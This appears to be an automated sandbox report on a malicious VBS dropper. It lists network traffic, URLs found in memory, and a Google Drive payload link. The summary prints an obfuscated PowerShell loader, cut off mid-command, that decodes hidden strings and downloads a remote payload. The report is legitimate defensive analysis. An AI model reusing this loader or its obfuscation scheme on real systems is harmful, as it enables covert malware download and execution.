ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AD-8ljt1RjSv6hgWhcRactfyOsekMzQoC07JjKpaABR2hR8xVe1RT2GaqfvZpggRr918ay4YGoq842yUKAServer: UploadServerSet-Cookie: NID=517=TYYrH7PW08eA_e5U2OuC4zmekvTUxL9y9Z0hSYlicR1c__kVJQs5xULdovxIj3IMXPMi_rdS8LNeC_fCziXbKGAjzcMEW4yG8zarYR9db8593BfYRuwpe5m1rfnmNFR8-YVfvaeNQ2W03vkoB6kiM4lLNwH7YtVvhCXyrPd0UQxAzsyZ3d0; expires=Wed, 02-Apr-2025 05:45:42 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 01 Oct 2024 05:45:48 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-_i0DtfREUVVlSIbKtp4JLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AD-8ljtljf0Ewfhqytx9iVo7nmtP2yYDqdRfk7K-KlU9Y2zyHbcMNuBPlWiupVMk9e0Ipjdkp8Lla0uERAServer: UploadServerSet-Cookie: NID=517=ayNybyF5N2eBPQYwkElV42dGDAo7dQDQxiFHFSICxvzYeUHQ8Auvb772g32F6tMuhU37CAI3kwDYH70R6YO3RPT0tciihaowI_fgJk0hB8bBGjogaqzZOxwWUoixwbKaXp4mZtGQuSZMsktz1QUq2laaEbkFMssVx1YBcZsGm_RpJq13Zw; expires=Wed, 02-Apr-2025 05:45:48 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRoot
      Source: wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTruste
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en$
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabE
      Source: wscript.exe, 00000000.00000003.1708284459.000001DC5CB05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?37763f6d4a
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD0EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0FC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD151F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
      Source: powershell.exe, 00000001.00000002.3009017913.000001ADDF913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCF8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.3013440346.000001ADE7FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCF8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD1135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPBjN
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0FC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD1135000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD08F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94P
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googhZ
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com(
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD0EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0782000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0775000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0786000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD096E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0C93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0974000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.3009017913.000001ADDF913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49763 version: TLS 1.2

      System Summary

      barindex
      Potential malicious VBS script found (suspicious strings)
      Source: Initial file: Call ationsvejledninger.ShellExecute(Endovenous, Coraled, "", "", Cheddite)
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI
